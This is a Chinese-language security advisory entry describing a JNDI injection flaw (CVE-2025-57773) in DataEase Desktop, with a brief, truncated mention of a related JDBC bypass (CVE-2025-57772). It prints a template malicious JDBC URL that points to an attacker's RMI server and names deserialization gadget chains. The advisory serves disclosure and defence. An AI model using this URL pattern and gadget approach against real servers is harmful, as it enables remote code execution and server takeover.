• 漏洞编号：CVE-2025-57773
• 漏洞等级：高危
• 漏洞标签：暂无
• 发布时间：2025-08-26

漏洞描述

DataEase是一款开源的数据可视化与分析平台，支持多种数据源接入，提供报表、看板、可视化大屏等功能，帮助用户实现数据查询、分析与展示。它支持JDBC、API等多种数据连接方式，适用于BI报表、数据分析及可视化场景。2025年8月26日，启明星辰集团VSRC监测到DataEase Desktop存在DataEase JNDI注入漏洞\(CVE\-2025\-57773\)。由于DB2数据源参数缺乏有效校验，攻击者可通过构造恶意JDBC URL（如jdbc:db2://…;clientRerouteServerListJNDIName\=rmi://<恶意服务器\>），触发JNDI远程加载，并结合commons\-collections 4.x与aspectjweaver\(<1.9.4\)的Gadget链实现反序列化攻击，从而达到任意文件写入或远程代码执行的目的，最终可能完全控制服务器，同时Dataease Desktop还存在Dataease JDBC逻辑绕过漏洞\(CVE\-2025\-57772\)，由于CalciteProvider\#getConnection方法中存在JDBC类型校验缺陷，攻击者可通...

修复建议

暂无

参考链接

https://www.venustech.com.cn/new_type/aqtg/20250826/28803.html